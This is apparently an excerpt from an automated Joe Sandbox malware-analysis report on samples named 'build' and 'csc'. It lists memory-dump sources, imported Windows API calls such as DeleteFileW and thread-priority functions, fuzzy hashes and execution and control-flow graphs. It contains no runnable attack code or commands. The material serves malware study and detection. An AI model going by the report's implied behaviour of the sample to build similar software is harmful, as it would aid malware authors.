                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 66b1f2d940cc2a15b99bd33e8a4f4fa5933c9faf2ed567310e30107212ecc8de
                      • Instruction ID: 2d25ff128d068f76006ad27daf84b356ad2c56a7a6956572dcec0643ae5f8720
                      • Opcode Fuzzy Hash: 66b1f2d940cc2a15b99bd33e8a4f4fa5933c9faf2ed567310e30107212ecc8de
                      • Instruction Fuzzy Hash: C26106B2C041159FFB1CCA24DE56AEEB779EB90300F1482FED90DA6284D6B85FC18E45
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ed25064e58b13f409ae6224364f1636c299320528e1d594b0044869da24cb299
                      • Instruction ID: b7e3b764450d4a7df2afc685ccfb6effe7e2e3bb59e6dbdaf1d74b26299d9b3e
                      • Opcode Fuzzy Hash: ed25064e58b13f409ae6224364f1636c299320528e1d594b0044869da24cb299
                      • Instruction Fuzzy Hash: 2FE0D8B18002145B9200EB24AC094A77FD8EA45224F048679EC4CC3151F732E919C7C7
                      APIs
                      • GetClientRect.USER32(?,?), ref: 00421F80
                      • GetDlgItem.USER32(?,00000001), ref: 00421FC2
                      • GetWindowRect.USER32(00000000,?), ref: 00421FD9
                      • GetWindowLongW.USER32(?,000000F0), ref: 004220B5
                      • CreateWindowExW.USER32(00000000,ScrollBar,005B5D98,54000014,00000000,00000000,80000000,80000000,?,00000000,00000000,00000000), ref: 004220EB
                      • GetClientRect.USER32(?,?), ref: 00422100
                      • GetWindowRect.USER32(00000000,?), ref: 00422112
                      • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00422141
                      • BeginDeferWindowPos.USER32(00000000), ref: 004221A6
                      • GetDlgItem.USER32(00000000,?), ref: 0042229A
                      • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000314), ref: 004222BE
                      • GetClientRect.USER32(00000000,?), ref: 004222E2
                      • GetWindowRect.USER32(00000000,?), ref: 004222F4
                      • IsZoomed.USER32(00000000), ref: 00422301
                      • DeferWindowPos.USER32(?,00000000,00000000,?,?,00000000,00000000,-00000355), ref: 0042233C
                      • EndDeferWindowPos.USER32(00000000), ref: 00422343
                      • EndDeferWindowPos.USER32(?), ref: 0042235A
                      • GetWindowLongW.USER32(?,000000F0), ref: 004223AC
                      • GetWindowLongW.USER32(?,000000EC), ref: 004223B7
                      • MapDialogRect.USER32(?,?), ref: 004223EE
                      • AdjustWindowRectEx.USER32(?,?,00000000,?), ref: 00422403
                      • MapDialogRect.USER32(?,00000000), ref: 0042244D
                      • AdjustWindowRectEx.USER32(?,?,00000000,?), ref: 00422462
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: Window$Rect$Defer$ClientLong$AdjustDialogItem$BeginCreateZoomed
                      • String ID: ScrollBar
                      • API String ID: 376062766-3978720103
                      • Opcode ID: 5876d8cce9d716d45ecffc8679df0715509107c4c30f3f23e34ab5b04b4a616f
                      • Instruction ID: e3a6938857b87d74d63ece223c9eab936984e1976c03630cfa8fdf1f6ee4a28b
                      • Opcode Fuzzy Hash: 5876d8cce9d716d45ecffc8679df0715509107c4c30f3f23e34ab5b04b4a616f
                      • Instruction Fuzzy Hash: C1F14771608701AFD720CF68D944B6ABBF4BF99304F048A1EF585A3660E775E894CF86
                      APIs
                      • GetCurrentThread.KERNEL32 ref: 00591B92
                      • GetThreadPriority.KERNEL32(00000000), ref: 00591B99
                      • SetThreadPriority.KERNEL32(00000000,00000000), ref: 00591BC7
                      • ResumeThread.KERNEL32(00000000), ref: 00591BCE
                      • GetCurrentThread.KERNEL32 ref: 00591C10
                      • GetThreadPriority.KERNEL32(00000000), ref: 00591C17
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: Thread$Priority$Current$Resume
                      • String ID: ^QB
                      • API String ID: 3552734753-2719061505
                      • Opcode ID: 0b9b04df810c6a639e566c421f498884d46788bd4c30f525041f0146986661ae
                      • Instruction ID: 03d6b9e87ad54b36b64c078c781d29aeb48e9228a4f65d4f39ea40a867c40331
                      • Opcode Fuzzy Hash: 0b9b04df810c6a639e566c421f498884d46788bd4c30f525041f0146986661ae
                      • Instruction Fuzzy Hash: EC31EE74A0121AEFCF14DFA4C848BAEBBB9FF44714F004259F812E3281DB74A944DBA4
                      APIs
                      • GetCurrentThread.KERNEL32 ref: 0059196A
                      • GetThreadPriority.KERNEL32(00000000), ref: 00591971
                      • GetThreadPriority.KERNEL32(00580217), ref: 0059197C
                      • SetThreadPriority.KERNEL32(00580217,00000000), ref: 0059198A
                      • WaitForSingleObject.KERNEL32(00580217,000000FF), ref: 00591995
                      • CloseHandle.KERNEL32(00580217), ref: 005919A3
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: Thread$Priority$CloseCurrentHandleObjectSingleWait
                      • String ID:
                      • API String ID: 1718353164-0
                      • Opcode ID: 73b32dfd8273e6295660c316631d924a610b0adb3fc8822fcb23d5032fc084f5
                      • Instruction ID: 6f4a0c1e44ae4caed6706faa0e674f7cc049ea5f26ed3caede93d4ef78788e63
                      • Opcode Fuzzy Hash: 73b32dfd8273e6295660c316631d924a610b0adb3fc8822fcb23d5032fc084f5
                      • Instruction Fuzzy Hash: 60F03AB5100A13ABCF605BB8EE5D819FB69BF643617108725F036826F2DB31A865EF04
                      APIs
                      • GetDlgItem.USER32(00000001,00000435), ref: 00422B2B
                      • GetDlgItem.USER32(00000001,0000048D), ref: 00422BCF
                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00422BDF
                      • DestroyWindow.USER32(00000001), ref: 00422BFE
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: Item$DestroyMessageSendWindow
                      • String ID:
                      • API String ID: 3090131160-0
                      • Opcode ID: ca2848b37b557aabb613ca1c7846c7075ea2733f794bd155616e8047f823f290
                      • Instruction ID: 56018adc457ee554f330d9e31960027dff2f61ac07181aeb852c591fced9a5cf
                      • Opcode Fuzzy Hash: ca2848b37b557aabb613ca1c7846c7075ea2733f794bd155616e8047f823f290
                      • Instruction Fuzzy Hash: 635154B0A00248ABDB20DFA9D949B9EBFF4BF58314F144519E411BB291CBB86904CFA0
                      APIs
                      • SendMessageW.USER32(?,00000418,00000000,?), ref: 00421A73
                      • SendMessageW.USER32(?), ref: 00421AA9
                      • SendMessageW.USER32(?,00000412,00000000), ref: 00421AD4
                      • SendMessageW.USER32(?,00000411,00000001,?), ref: 00421AE1
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: MessageSend
                      • String ID:
                      • API String ID: 3850602802-0
                      • Opcode ID: e154f3616b20d02131f8ac69e930b8d754935b032ca4746cd1b7db9f1f45573e
                      • Instruction ID: 056b8dc03bbacfd0d86dd61f933739a328027decfb519111fb1f3285849d17ed
                      • Opcode Fuzzy Hash: e154f3616b20d02131f8ac69e930b8d754935b032ca4746cd1b7db9f1f45573e
                      • Instruction Fuzzy Hash: 98116A71240304ABE7209F2ACD85F1BBBE8FB84B45F40892DF685965A1C7B1F908CB64
                      APIs
                      • SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 00421959
                      • SendMessageW.USER32(?,00000411,00000000,?), ref: 00421971
                      • SendMessageW.USER32(?,00000433,00000000,?), ref: 00421982
                      • GetWindowRect.USER32(?,?), ref: 0042199F
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: MessageSend$RectWindow
                      • String ID:
                      • API String ID: 1944065686-0
                      • Opcode ID: 7b2f938d5d4943be965eb0663962e518f7f26e6a711bc9cb0b5819c0799ef7b5
                      • Instruction ID: 594fdfbadbf35a74eff55c0d0a36d92e90d8671c7fb2c7794805fcb4d06949e0
                      • Opcode Fuzzy Hash: 7b2f938d5d4943be965eb0663962e518f7f26e6a711bc9cb0b5819c0799ef7b5
                      • Instruction Fuzzy Hash: 8F112771B016247BDB219F29EC06F9BBB68EF21760F444316FD04662A1D770BA94CBD8
                      APIs
                      • SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 00421959
                      • SendMessageW.USER32(?,00000411,00000000,?), ref: 00421971
                      • SendMessageW.USER32(?,00000433,00000000,?), ref: 00421982
                      • GetWindowRect.USER32(?,?), ref: 0042199F
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: MessageSend$RectWindow
                      • String ID:
                      • API String ID: 1944065686-0
                      • Opcode ID: 59de93ffc885d8b3cfd5118fbbd8d5450dd13599d371894dab07d54a46468e35
                      • Instruction ID: 976cf0dfd2e6fdd224c174f1518e0448649e182263952f6c5103e505f245c106
                      • Opcode Fuzzy Hash: 59de93ffc885d8b3cfd5118fbbd8d5450dd13599d371894dab07d54a46468e35
                      • Instruction Fuzzy Hash: D2112770B01224BBDB218F29EC01B9AB764FF21710F444206FD0466161D770E994CBC8
                      APIs
                      • GetCurrentThreadId.KERNEL32 ref: 004E553C
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: CurrentThread
                      • String ID: %path_sort%$Dc[
                      • API String ID: 2882836952-418770324
                      • Opcode ID: 4da7f740f64944a77406cc8cf8fc37ffc635ebb709fc4d4f05e17eb5a452c0a7
                      • Instruction ID: 80f9f5d8d4006964c7a56ff0b8deedac7b6fac6e158ca5e25abf240470f13d79
                      • Opcode Fuzzy Hash: 4da7f740f64944a77406cc8cf8fc37ffc635ebb709fc4d4f05e17eb5a452c0a7
                      • Instruction Fuzzy Hash: 0A41F334A016859FCB10DFA6D814BAEBBF2FF5530AF58419AD801A73A1DB35AC04CF54

                      Execution Graph

                      Execution Coverage:10.3%
                      Dynamic/Decrypted Code Coverage:96.3%
                      Signature Coverage:0%
                      Total number of Nodes:81
                      Total number of Limit Nodes:6
                      execution_graph 19681 650d208 19682 650d220 19681->19682 19683 650d27a 19682->19683 19685 ae41788 19682->19685 19686 ae417b5 19685->19686 19687 ae417e9 19686->19687 19689 ae417d9 19686->19689 19702 ae413c4 19687->19702 19693 ae41bc4 19689->19693 19698 ae41af8 19689->19698 19690 ae417e7 19694 ae41b82 19693->19694 19695 ae41bd2 19693->19695 19706 ae41bb0 19694->19706 19696 ae41b98 19696->19690 19700 ae41b0c 19698->19700 19699 ae41b98 19699->19690 19701 ae41bb0 CallWindowProcW 19700->19701 19701->19699 19703 ae413cf 19702->19703 19704 ae430aa CallWindowProcW 19703->19704 19705 ae43059 19703->19705 19704->19705 19705->19690 19707 ae41bc1 19706->19707 19709 ae42fe2 19706->19709 19707->19696 19710 ae413c4 CallWindowProcW 19709->19710 19711 ae42ffa 19710->19711 19711->19707 19725 6630848 19726 6630852 19725->19726 19730 66321a0 19725->19730 19727 663089e 19726->19727 19735 663af40 19726->19735 19731 66321a4 19730->19731 19741 66322a1 19731->19741 19745 66322b0 19731->19745 19737 663af44 19735->19737 19736 663b003 19736->19727 19737->19736 19753 663fc22 19737->19753 19763 663fc30 19737->19763 19738 663b0ab 19738->19727 19742 66322a4 19741->19742 19744 66323b4 19742->19744 19749 6631978 19742->19749 19747 66322b2 19745->19747 19746 66323b4 19746->19746 19747->19746 19748 6631978 CreateActCtxA 19747->19748 19748->19746 19750 6633340 CreateActCtxA 19749->19750 19752 6633403 19750->19752 19752->19752 19754 663fc2b 19753->19754 19756 663fc44 19754->19756 19773 663f928 19754->19773 19760 663fc22 2 API calls 19756->19760 19761 663fc30 2 API calls 19756->19761 19762 663f928 DeleteFileW 19756->19762 19757 663fc45 19757->19738 19758 663fcaa DeleteFileW 19757->19758 19759 663fcd7 19758->19759 19759->19738 19760->19757 19761->19757 19762->19757 19764 663fc36 19763->19764 19765 663f928 DeleteFileW 19764->19765 19766 663fc44 19764->19766 19765->19764 19770 663fc22 2 API calls 19766->19770 19771 663fc30 2 API calls 19766->19771 19772 663f928 DeleteFileW 19766->19772 19767 663fc45 19767->19738 19768 663fcaa DeleteFileW 19767->19768 19769 663fcd7 19768->19769 19769->19738 19770->19767 19771->19767 19772->19767 19774 663fc58 DeleteFileW 19773->19774 19776 663fcd7 19774->19776 19776->19754 19712 ae454b8 19713 ae457c0 19712->19713 19714 ae454e0 19712->19714 19715 ae454e9 19714->19715 19718 ae44854 19714->19718 19717 ae4550c 19720 ae4485f 19718->19720 19719 ae45803 19719->19717 19720->19719 19722 ae44870 19720->19722 19723 ae45838 OleInitialize 19722->19723 19724 ae4589c 19723->19724 19724->19719 19777 ae46359 19778 ae46389 19777->19778 19779 ae46768 WaitMessage 19778->19779 19780 ae46414 19778->19780 19779->19778
                      Memory Dump Source
                      • Source File: 00000009.00000002.2974247838.000000000AE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_ae40000_csc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3f87e6c26468ab0a4f2b7ea51163c31a419d888c65fffe78e84061ffa09e5435
                      • Instruction ID: 7010a12d1c36dbfb2a5b5918f82ca45afca01e68b67514c57edb0ed457f76471
                      • Opcode Fuzzy Hash: 3f87e6c26468ab0a4f2b7ea51163c31a419d888c65fffe78e84061ffa09e5435
                      • Instruction Fuzzy Hash: 79D17D30A00208CFDB14DFA9D948BADBBF6BF85308F159559E409AF2A5DB74E845CF80

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 296 a660048-a660068 297 a66006f-a660071 296->297 298 a660073-a660079 297->298 299 a660089-a6600bd 297->299 300 a66007d-a66007f 298->300 301 a66007b 298->301 304 a6600c0-a6600c4 299->304 300->299 301->299 305 a6600c6-a6600cb 304->305 306 a6600cd-a6600d2 304->306 307 a6600d8-a6600db 305->307 306->307 308 a660db7-a660dc1 307->308 309 a6600e1-a6600f5 307->309 309->304 311 a6600f7 309->311 312 a660484-a660493 311->312 313 a6603a2-a6603b1 311->313 314 a6602c0-a6602cf 311->314 315 a6600fe-a66010b 311->315 316 a6601de-a6601ed 311->316 317 a660d3f-a660d63 312->317 318 a660499-a6604bf 312->318 313->317 319 a6603b7-a6603dd 313->319 314->317 320 a6602d5-a6602fb 314->320 315->317 322 a660111-a660137 315->322 316->317 321 a6601f3-a660219 316->321 332 a660f32-a660f37 317->332 333 a660d69-a660d70 317->333 351 a6604c1-a6604c6 318->351 352 a6604c8-a6604cf 318->352 353 a6603e6-a6603ed 319->353 354 a6603df-a6603e4 319->354 344 a660304-a66030b 320->344 345 a6602fd-a660302 320->345 346 a660222-a660229 321->346 347 a66021b-a660220 321->347 348 a660140-a660147 322->348 349 a660139-a66013e 322->349 333->332 337 a660d76-a660d91 333->337 337->332 367 a660d97-a660d9f 337->367 359 a660331-a660355 344->359 360 a66030d-a66032f 344->360 358 a660370-a66039d 345->358 362 a66024f-a660273 346->362 363 a66022b-a66024d 346->363 361 a66028e-a6602bb 347->361 365 a66016d-a660191 348->365 366 a660149-a66016b 348->366 364 a6601ac-a6601d9 349->364 368 a660534-a660561 351->368 369 a6604f5-a660519 352->369 370 a6604d1-a6604f3 352->370 356 a660413-a660437 353->356 357 a6603ef-a660411 353->357 355 a660452-a66047f 354->355 355->304 406 a66044f 356->406 407 a660439-a66043f 356->407 357->355 358->304 408 a660357-a66035d 359->408 409 a66036d 359->409 360->358 361->304 410 a660275-a66027b 362->410 411 a66028b 362->411 363->361 364->304 402 a660193-a660199 365->402 403 a6601a9 365->403 366->364 367->332 371 a660da5-a660dae 367->371 368->304 404 a660531 369->404 405 a66051b-a660521 369->405 370->368 371->308 414 a66019d-a66019f 402->414 415 a66019b 402->415 403->364 404->368 416 a660525-a660527 405->416 417 a660523 405->417 406->355 418 a660443-a660445 407->418 419 a660441 407->419 420 a660361-a660363 408->420 421 a66035f 408->421 409->358 412 a66027f-a660281 410->412 413 a66027d 410->413 411->361 412->411 413->411 414->403 415->403 416->404 417->404 418->406 419->406 420->409 421->409
                      Strings
                      Memory Dump Source
                      • Source File: 00000009.00000002.2974018869.000000000A660000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A660000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_a660000_csc.jbxd
                      Similarity
                      • API ID:
                      • String ID: ?$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                      • API String ID: 0-2982888449
                      • Opcode ID: c3e9729193b8724ad823118b6bf749efb34026161863426e8ed0c104bbafc0c7
                      • Instruction ID: d01b9594f48a19bc26eb671d6cb26975a16be439f573c1c0b228a6128a0e6e7f
                      • Opcode Fuzzy Hash: c3e9729193b8724ad823118b6bf749efb34026161863426e8ed0c104bbafc0c7
                      • Instruction Fuzzy Hash: CBF1AD30B402099FDB28DFA5C944A6EBBB6FF88700F15C529E4069B3A5DB35EC46CB51

                      Control-flow Graph

